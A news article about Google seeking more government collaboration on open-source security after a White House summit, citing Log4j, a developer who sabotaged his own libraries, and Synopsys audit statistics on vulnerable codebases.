Google wants to increase government collaboration to secure open-source

Google wants to increase government collaboration to secure open-source

Google says that it wants to increase government collaboration to help secure open source after participating in a White House summit.

On Thursday, Google participated in the White House Open Source Software Security Summit with the aim of building on its work with the Administration to strengthen America collective cybersecurity through critical areas like open-source software.

The past year has been particularly bad for open-source security problems, with several even making national headlines. This year has not begun much better.

Open-source is broken

While it was technically uncovered in December, the fallout from the Log4j vulnerability has continued into the new year. A vulnerability with the open source logging library commonly used by apps and services across the internet enables attackers to break into systems, steal passwords and logins, extract data, and infect networks with malicious software.

The Log4j vulnerability appears to have been entirely accidental and has since been patched, although many apps and services are yet to implement it. However, some open-source issues are introduced on purpose.

Just earlier this week, Developer reported on an open-source developer that corrupted two of his popular libraries to indefinitely print gibberish messages to the consoles of users of apps making use of the libraries rendering them useless. Then, of course, there was that whole SolarWinds fiasco last year.

Open-source is key to modern software development. The benefits are numerous: helping to speed up releases, avoid vendor lock-in, lower costs, increase transparency, and many projects have a great community spirit (many also do not, but we will stick to the positives!)

According to Synopsys 2021 Open Source Security and Risk Analysis (OSSRA) report, 98 percent of the audited codebases contained at least one open-source component and 75 percent of all codebases were composed of open-source.

However, 84 percent of codebases were found to have at least one vulnerability; with an average of 158 per codebase. The average vulnerability found was 2.2 years old.

The lack of payment for his work is one reason the aforementioned open-source developer corrupted his own libraries.

Respectfully, I am no longer going to support Fortune 500s (and other smaller sized companies) with my free work, he wrote in a post on his project GitHub. Take this as an opportunity to send me a six-figure yearly contract or fork the project and have someone else work on it.

Social Share

Trending Posts

Join Thousand of Happy Students!

Subscribe our newsletter & get latest news and updation!